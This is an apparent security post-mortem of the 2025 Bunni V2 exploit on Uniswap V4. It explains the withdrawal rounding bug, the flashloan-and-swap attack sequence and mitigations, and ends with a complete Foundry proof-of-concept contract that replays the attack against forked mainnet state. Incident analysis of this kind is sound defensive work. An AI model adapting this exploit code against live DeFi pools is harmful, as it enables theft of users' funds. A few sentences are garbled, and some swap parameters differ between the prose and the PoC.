Bunni

Total Losses

$8.4M+

Date

September 2, 2025

Network

ethereum

unichain

Step-by-step Overview

Bunni V2 a liquidity management protocol built as a hook on Uniswap V4 with a custom Liquidity Distribution Function (LDF)—suffered an $8.4M exploit across two pools: USDC/USDT on Ethereum ($2.4M) and weETH/ETH on Unichain ($5.9M). The root cause was a rounding-direction bug in BunniHubLogic::withdraw() that, when exploited through repeated withdrawals, allowed the attacker to reduce the pool’s total liquidity calculation. The attack combined flashloan, swaps to manipulate balance ratios, 44 withdrawals to compound rounding errors, and a exploiting the liquidity to extract value.

The Bunni V2 exploit unfolded in three phases, exploiting subtle rounding errors in liquidity management:

Initial Pool Manipulation:
- The attacker flashloaned 3M USDT from Uniswap V3 to fund the attack
- Executed a sequence of three swaps (USDT→USDC, USDC→USDT, USDT→USDC)
- These swaps pushed the spot price to extreme values
- The pool’s active USDC balance was reduced to just 28 wei while maintaining a large idle balance
- The price movement was enabled by Bunni’s carpeted double geometric liquidity distribution
Exploitation Through Repeated Withdrawals (Liquidity Drain):
- Performed 44 sized small withdrawals from the LP position
- Each withdrawal exploited a rounding error in the idle balance update calculation
- The mulDiv operation in BunniHubLogic::withdraw() rounded down the idle balance decrease
- This caused the idle balance to remain artificially high relative to the active balance
- Active USDC balance was disproportionately reduced from 28 wei to just 4 wei
- Total pool liquidity erroneously decreased by 84.4% from 5.83e16 to 9.114e15
- The cumulative effect of rounding errors across multiple operations created the vulnerability
Sandwich Attack on Liquidity Increase (Profit Extraction):
- Executed a first swap, pushing the tick to 839189 which corresponds to 1 USDC = 2.77e36 USDT.
- The artificially low liquidity from step 2 caused price impact
- This extreme price caused the liquidity estimation to flip from totalLiquidityEstimate0 to totalLiquidityEstimate1
- The new estimate 1.065e16 was higher than the manipulated value 9.114e15 but still below the original 5.83e16
- Executed The attacker exploited this self-created liquidity rebound by trading at the manipulated prices
- Executed a second swap for USDT at the inflated price
- Repaid the 3M USDT flashloan plus fees to Uniswap V3
- Net profit: ~1.33M USDC and ~1M USDT

Detailed Description

The Bunni exploit represents the cumulative effects of seemingly benign rounding decisions across multiple operations. The attack leveraged three key design characteristics of Bunni’s custom Liquidity Distribution Function (LDF):

The carpeted double geometric distribution allowing extreme price movements
The dual-balance system with insufficient validation
The liquidity estimation mechanism that switches between token0 and token1 based estimates

Phase 1: Active Balance Manipulation Through Swap Sequencing

Bunni pools maintain two distinct balance components:

Active Balance: Liquidity actively providing swap services
Idle Balance: Reserves not currently in the active tick range

The attacker’s create a massive imbalance between these two components for USDC (token0).

// From the PoC - Initial swap sequence
function executeInitialSwapSequence() internal {
    IPoolManager.SwapParams[] memory swapParams = new IPoolManager.SwapParams[](3);
    
    // Swap 1: Small USDT->USDC to test pool state
    swapParams[0] = IPoolManager.SwapParams({
        zeroForOne: false,
        amountSpecified: -17_088106,
        sqrtPriceLimitX96: 79226236828369693485340663719
    });
    
    // Swap 2: Large USDC->USDT to drain active reserves
    swapParams[1] = IPoolManager.SwapParams({
        zeroForOne: false,
        amountSpecified: 1_835_309_634512,
        sqrtPriceLimitX96: 1461446703485210103287273052203988822378723970341
    });
    
    // Swap 3: Small USDT->USDC to finalize manipulation
    swapParams[2] = IPoolManager.SwapParams({
        zeroForOne: false,
        amountSpecified: -1_000000,
        sqrtPriceLimitX96: 101729702841318637793976746270
    });
}

After these swaps:

Active balance USDC: Only 28 wei
The spot tick reached to 1.688 USDT per USDC

By reducing the active balance to nearly zero while maintaining a large idle balance, the attacker created the conditions for exploiting rounding errors in subsequent withdrawals.

Phase 2: The Rounding Error

The vulnerability resided in this seemingly innocuous line from BunniHubLogic::withdraw():

// decrease idle balance proportionally to the amount removed
{
    (uint256 balance, bool isToken0) = IdleBalanceLibrary.fromIdleBalance(state.idleBalance);
    uint256 newBalance = balance - balance.mulDiv(shares, currentTotalSupply); // VULNERABLE LINE
    if (newBalance != balance) {
        s.idleBalance[poolId] = newBalance.toIdleBalance(isToken0);
    }
}

The mulDiv operation rounds down, which was intended to round up the remaining idle balance. However, when the active balance is extremely small relative to the idle balance, this creates a compounding error.

Phase 3: Profit Extraction

With liquidity artificially reduced to 9.114e15, the attacker executed a two-swap sandwich to extract value:

Swap 4: Creating Price Impact

The attacker swapped an enormous amount of USDT for USDC, pushing the price:

// Swap 4: Buy USDC with massive USDT amount
swapParams2[0] = IPoolManager.SwapParams({
    zeroForOne: false,
    amountSpecified: -10_000_000_000_000_000000,  // 10 quintillion USDT
    sqrtPriceLimitX96: 1461446703485210103287273052203988822378723970341
});

Result:

Price pushed to tick 839,189 (~2.78e36 USDT per USDC)
Received: 1 wei USDC

This extreme price movement caused Bunni’s liquidity estimation to flip from using the USDC-based estimate to the USDT-based estimate:

Before: totalLiquidity = 9.114e15
After: totalLiquidity = 1.065e16

Swap 5: Extracting Profit at Inflated Prices

With prices at extremes but liquidity now higher, the attacker reversed the trade:

// Swap 5: Sell USDC for USDT at inflated price
swapParams2[1] = IPoolManager.SwapParams({
    zeroForOne: true,
    amountSpecified: 10_000_002_885_864_344623,
    sqrtPriceLimitX96: 4295128740
});

Final Settlement:

// From the PoC - After both swaps complete
console.log('------- STEP 6: Repay flash loan -------\n');
USDT.safeTransfer(address(pairWethUsdt), FLASH_LOAN_AMOUNT + fee);

console.log('------- FINAL BALANCES -------');
// Final profit: ~1.33M USDC + ~1M USDT after repaying 3M USDT loan

Conclusions beyond the Post-Mortem

The Bunni team’s post-mortem identified the cause as incorrect rounding direction in withdrawal logic. However, the rounding directions that appear safe in isolation became erroneous when chained across multiple operations. The protocol’s dual liquidity estimation mechanism totalLiquidityEstimate0 vs totalLiquidityEstimate1 created an exploitable transition point—the attacker manipulated which estimate was active by pushing prices to extremes, then profited from the switch. Most critically, no invariant checks prevented the active/idle balance ratio from reaching incredible levels. The largest pool on Unichain USDC/USD₮0 survived only because insufficient flashloan liquidity was available—the attack required ~17M but Euler’s vault held only ~11M.

Bunni’s custom Liquidity Distribution Function introduced novel concepts in AMM design, but custom mathematical models inherently increase edge case likelihood. Complex interactions between the LDF, dual balance system, and Uniswap V4 hooks multiplied risk exponentially. Without extensive battle-testing and invariant-based safeguards.

Possible Mitigations

Based on the identified vulnerabilities and Bunni’s post-mortem analysis, several mitigations can be proposed:

1. Rounding Direction

Correct Withdrawal Rounding: The immediate fix identified by Bunni involves changing the rounding direction in BunniHubLogic::withdraw() from rounding down to rounding up when calculating idle balance decreases. This prevents the accumulation of artificially inflated idle balances across multiple withdrawals.

2. Withdrawal Controls

Minimum Withdrawal Sizes: Prevent micro-withdrawals by enforcing minimum withdrawal amounts unless the user is withdrawing their entire balance. The attacker’s 44 tiny withdrawals were specifically sized to compound rounding errors—such operations should trigger safeguards.

3. Comprehensive Testing Framework

Fuzz Testing: As Bunni acknowledged, existing Foundry and Medusa fuzz tests failed to cover multi-step manipulation scenarios. Protocols with custom accounting logic must implement extensive fuzz testing and simulations that cover the edge conditions.

Bunni.attack.sol

solidity

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import {Test, console} from "forge-std/Test.sol";
import {TokenBalanceTracker} from "../../modules/TokenBalanceTracker.sol";

import {IUniswapV3Pool, IUniswapV3FlashCallback, IBunniHub} from "./Interfaces.sol";
import {SafeERC20, IERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

import {IHooks} from "@uniswap/v4-core/src/interfaces/IHooks.sol";
import {IPoolManager} from "@uniswap/v4-core/src/interfaces/IPoolManager.sol";
import {BalanceDelta} from "@uniswap/v4-core/src/types/BalanceDelta.sol";
import {Currency} from "@uniswap/v4-core/src/types/Currency.sol";
import {PoolKey} from "@uniswap/v4-core/src/types/PoolKey.sol";
import {PoolId} from "@uniswap/v4-core/src/types/PoolId.sol";


contract Exploit_Bunni is IUniswapV3FlashCallback, Test, TokenBalanceTracker {
    using SafeERC20 for IERC20;

    bytes32 constant EXPLOIT_TX =
        0x1c27c4d625429acfc0f97e466eda725fd09ebdc77550e529ba4cbdbc33beb97b;

    address private constant attacker =
        0x657D8BcCDD9C6e1Da8DA1e7d331CFdeA8357AdBc;

    IERC20 private constant USDC =
        IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
    IERC20 private constant USDT =
        IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);

    Currency private constant USDC_C = Currency.wrap(address(USDC));
    Currency private constant USDT_C = Currency.wrap(address(USDT));

    IUniswapV3Pool private constant pairWethUsdt =
        IUniswapV3Pool(0x4e68Ccd3E89f51C3074ca5072bbAC773960dFa36);
    IERC20 private constant pairUsdcUsdt =
        IERC20(0xc92c2ba90213Fc3048A527052B0b4FeBFA716763); // Bunni LP

    uint256 private constant FLASH_LOAN_AMOUNT = 3e12; // 3M USDT

    IPoolManager constant POOL_MANAGER =
        IPoolManager(0x000000000004444c5dc75cB358380D2e3dE08A90);
    IBunniHub constant BUNNI_HUB =
        IBunniHub(0x000000000049C7bcBCa294E63567b4D21EB765f1);
    IHooks private constant BUNNI_HOOK =
        IHooks(0x000052423c1dB6B7ff8641b85A7eEfc7B2791888);

    PoolKey poolKey;
    PoolId poolId;

    enum UnlockCallbackType {
        SWAP
    }

    struct SwapCallbackInputData {
        PoolKey poolKey;
        IPoolManager.SwapParams[] params;
        int256[][] expectedDeltas;
        bytes hookData;
    }

    function setUp() public {
        // Fork at exploit transaction to replicate exact chain state when the attack occurred
        vm.createSelectFork(vm.envString("RPC_URL"), EXPLOIT_TX);

        // Configure the Uniswap v4 pool key for the USDC/USDT pair
        poolKey = PoolKey({
            currency0: USDC_C,
            currency1: USDT_C,
            fee: 0,
            tickSpacing: 1,
            hooks: BUNNI_HOOK
        });

        // This poolId is used to reference this specific pool in the Pool Manager
        poolId = poolKey.toId();
        deal(address(this), 0);
        addTokenToTracker(address(USDC));
        addTokenToTracker(address(USDT));
        addTokenToTracker(address(pairUsdcUsdt));
        updateBalanceTracker(address(this));
    }

    function test_attack() public {
        console.log("------- INITIAL BALANCES -------");
        logBalancesWithLabel("Attacker", address(this));

        console.log(
            "------- STEP 1: Transfer LP tokens to exploit contract -------"
        );
        // Transfer Bunni USDC/USDT LP tokens from attacker to this contract
        // These LP tokens represent liquidity positions in the Bunni pool
        uint256 exploiterBalanceLp = pairUsdcUsdt.balanceOf(attacker);

        vm.prank(attacker);
        pairUsdcUsdt.safeTransfer(address(this), exploiterBalanceLp);
        vm.stopPrank();

        logBalancesWithLabel("Attacker", address(this));

        console.log(
            "------- STEP 2: Initiate flash loan from Uniswap V3 -------"
        );
        // Flash loan 3M USDT from WETH/USDT pool to fund the attack
        pairWethUsdt.flash(address(this), 0, FLASH_LOAN_AMOUNT, "");
    }

    function uniswapV3FlashCallback(
        uint256 /* fee0 */,
        uint256 fee,
        bytes calldata /* data */
    ) external override {
        logBalancesWithLabel("Exploit contract ", address(this));

        // Execute multi-stage exploitation sequence
        executeInitialSwapSequence(); // Step 3: Manipulate pool price
        executeWithdrawalSequence(); // Step 4: Drain liquidity via rounding errors
        executeFinalSwapSequence(); // Step 5: Extract profit and restore pool state

        console.log("------- STEP 6: Repay flash loan -------\n");
        USDT.safeTransfer(address(pairWethUsdt), FLASH_LOAN_AMOUNT + fee);

        console.log("------- FINAL BALANCES -------");
        logBalancesWithLabel("Attacker", address(this));
    }

    // Execute initial swap sequence to manipulate pool price and reserves
    function executeInitialSwapSequence() internal {
        console.log("------- STEP 3: Execute initial swap sequence -------");
        IPoolManager.SwapParams[]
            memory swapParams = new IPoolManager.SwapParams[](3);
        int256[][] memory expectedDeltas = new int256[][](3);
        
        // Parameters extracted from exploit transaction logs (>1000 events emitted by attacker's contract)
        // https://etherscan.io/tx/0x1c27c4d625429acfc0f97e466eda725fd09ebdc77550e529ba4cbdbc33beb97b#eventlog#545
        // Swap 1: Small USDT->USDC swap to test pool state
        swapParams[0] = IPoolManager.SwapParams({
            zeroForOne: false,
            amountSpecified: -17_088106,
            sqrtPriceLimitX96: 79226236828369693485340663719
        });

        expectedDeltas[0] = new int256[](2);
        expectedDeltas[0][0] = 2;
        expectedDeltas[0][1] = swapParams[0].amountSpecified;

        // Swap 2: Large USDC->USDT swap to drain pool reserves
        swapParams[1] = IPoolManager.SwapParams({
            zeroForOne: false,
            amountSpecified: 1_835_309_634512,
            sqrtPriceLimitX96: 79244008939029797398564130531
        });

        expectedDeltas[1] = new int256[](2);
        expectedDeltas[1][0] = swapParams[1].amountSpecified; // Pays 1.8M USDC
        expectedDeltas[1][1] = -1_835_492_291952; //  Receives 1.8M USDT

        // Swap 3: Small USDT->USDC swap to finalize manipulation
        swapParams[2] = IPoolManager.SwapParams({
            zeroForOne: false,
            amountSpecified: -1_000000,
            sqrtPriceLimitX96: 101729702841318637793976746270
        });

        expectedDeltas[2] = new int256[](2);
        expectedDeltas[2][0] = 472;
        expectedDeltas[2][1] = swapParams[2].amountSpecified;

        console.log("Executing 3 swaps to manipulate pool reserves");
        // Execute all three swaps through PoolManager.unlock()
        // This triggers the unlockCallback which handles token settlements
        POOL_MANAGER.unlock(
            abi.encode(
                UnlockCallbackType.SWAP,
                abi.encode(
                    SwapCallbackInputData({
                        poolKey: poolKey,
                        params: swapParams,
                        expectedDeltas: expectedDeltas,
                        hookData: ""
                    })
                )
            )
        );
        console.log("Initial swap sequence completed\n");
        logBalancesWithLabel("After initial swaps", address(this));
    }

    // Uniswap V4 callback triggered by PoolManager.unlock()
    // The unlock mechanism allows  multi-step operations where token deltas
    // are accumulated and settled at the end, rather than immediately
    function unlockCallback(
        bytes calldata data
    ) external returns (bytes memory) {
        console.log("Unlock callback triggered");
        // Track cumulative token deltas across all operations
        int128 cumulativeUsdcDelta;
        int128 cumulativeUsdtDelta;
        // Decode callback type and extract swap parameters
        (, bytes memory callbackData) = abi.decode(
            data,
            (UnlockCallbackType, bytes)
        );
        SwapCallbackInputData memory swapData = abi.decode(
            callbackData,
            (SwapCallbackInputData)
        );
        // Execute each swap and accumulate the resulting token deltas
        for (uint256 i; i < swapData.params.length; i++) {
            // Execute the swap through PoolManager
            // The swap modifies pool reserves and returns the token deltas
            BalanceDelta swapDelta = POOL_MANAGER.swap(
                swapData.poolKey,
                swapData.params[i],
                swapData.hookData
            );
            // Extract USDC and USDT deltas from the swap result
            (int128 usdcDelta, int128 usdtDelta) = (
                swapDelta.amount0(),
                swapDelta.amount1()
            );
            // Accumulate deltas for final settlement
            cumulativeUsdcDelta += usdcDelta;
            cumulativeUsdtDelta += usdtDelta;
        }
        // Settle all accumulated token deltas with the PoolManager
        reconcilePoolManagerBalances(cumulativeUsdcDelta, cumulativeUsdtDelta);
    }

    // Reconcile token balances with the PoolManager after swap execution
    // The PoolManager tracks deltas during swaps and requires settlement before unlock completes
    function reconcilePoolManagerBalances(
        int128 cumulativeUsdcDelta,
        int128 cumulativeUsdtDelta
    ) internal {
        console.log("Settling token deltas with PoolManager");
        // settle USDC deltas
        if (cumulativeUsdcDelta > 0) {
            uint256 usdcAmount = uint256(uint128(cumulativeUsdcDelta));
            POOL_MANAGER.take(USDC_C, address(this), usdcAmount);
            console.log("Taking USDC from PoolManager:", usdcAmount);
        } else if (cumulativeUsdcDelta < 0) {
            uint256 usdcAmount = uint256(uint128(-cumulativeUsdcDelta));
            POOL_MANAGER.sync(USDC_C);
            USDC.safeTransfer(address(POOL_MANAGER), usdcAmount);
            POOL_MANAGER.settle();
            console.log("Settling USDC to PoolManager:", usdcAmount);
        }

        // settle USDT deltas
        if (cumulativeUsdtDelta > 0) {
            uint256 usdtAmount = uint256(uint128(cumulativeUsdtDelta));
            POOL_MANAGER.take(USDT_C, address(this), usdtAmount);
            console.log("Taking USDT from PoolManager:", usdtAmount);
        } else if (cumulativeUsdtDelta < 0) {
            uint256 usdtAmount = uint256(uint128(-cumulativeUsdtDelta));
            POOL_MANAGER.sync(USDT_C);
            USDT.safeTransfer(address(POOL_MANAGER), usdtAmount);
            POOL_MANAGER.settle();
            console.log("Settling USDT to PoolManager:", usdtAmount);
        }
        console.log("Token deltas settled successfully\n");
    }

    // Execute repeated withdrawals to drain liquidity from the manipulated pool
    function executeWithdrawalSequence() internal {
        console.log("------- STEP 4: Execute withdrawal sequence -------");
        // Track total tokens withdrawn across all iterations
        uint256 totalUsdcWithdrawn;
        uint256 totalUsdtWithdrawn;
        // Prepare withdrawal parameters for two different withdrawal amounts
        IBunniHub.WithdrawParams[]
            memory withdrawParams = new IBunniHub.WithdrawParams[](2);
        uint256[][] memory expectedAmounts = new uint256[][](2);
        // First withdrawal
        withdrawParams[0] = IBunniHub.WithdrawParams({
            poolKey: poolKey,
            recipient: address(this),
            shares: 119254548996,
            amount0Min: 0,
            amount1Min: 0,
            deadline: block.timestamp,
            useQueuedWithdrawal: false
        });

        // Second withdrawal
        withdrawParams[1] = IBunniHub.WithdrawParams({
            poolKey: poolKey,
            recipient: address(this),
            shares: 331262636100,
            amount0Min: 0,
            amount1Min: 0,
            deadline: block.timestamp,
            useQueuedWithdrawal: false
        });

        // Execute first withdrawal
        (uint256 amount0, uint256 amount1) = BUNNI_HUB.withdraw(
            withdrawParams[0]
        );
        totalUsdcWithdrawn += amount0;
        totalUsdtWithdrawn += amount1;
        // Execute 43 iterations of the larger withdrawal
        for (uint256 i; i < 43; i++) {
            (amount0, amount1) = BUNNI_HUB.withdraw(withdrawParams[1]);
            totalUsdcWithdrawn += amount0;
            totalUsdtWithdrawn += amount1;
        }

        logBalancesWithLabel("After withdrawals", address(this));
    }

    // Execute final swap sequence to extract profit
    function executeFinalSwapSequence() internal {
        console.log("------- STEP 5: Execute final swap sequence -------");
        IPoolManager.SwapParams[]
            memory swapParams = new IPoolManager.SwapParams[](2);
        int256[][] memory expectedDeltas = new int256[][](2);

        // Swap 4: Extreme USDT->USDC swap to maximize manipulation
        swapParams[0] = IPoolManager.SwapParams({
            zeroForOne: false,
            amountSpecified: -10_000_000_000_000_000000,
            sqrtPriceLimitX96: 132047072987237266478933153881482415680958757549
        });

        expectedDeltas[0] = new int256[](2);
        expectedDeltas[0][0] = 1;
        expectedDeltas[0][1] = swapParams[0].amountSpecified;

        // Swap 5: Reverse USDC->USDT to extract profit
        swapParams[1] = IPoolManager.SwapParams({
            zeroForOne: true,
            amountSpecified: 10_000_002_885_864_344623,
            sqrtPriceLimitX96: 4295128740
        });

        expectedDeltas[1] = new int256[](2);
        expectedDeltas[1][0] = -503_177_409646;
        expectedDeltas[1][1] = swapParams[1].amountSpecified;

        // Execute both swaps
        POOL_MANAGER.unlock(
            abi.encode(
                UnlockCallbackType.SWAP,
                abi.encode(
                    SwapCallbackInputData({
                        poolKey: poolKey,
                        params: swapParams,
                        expectedDeltas: expectedDeltas,
                        hookData: ""
                    })
                )
            )
        );
        console.log("Final swap sequence completed\n");
        logBalancesWithLabel("After final swaps", address(this));
    }
}

Interfaces.sol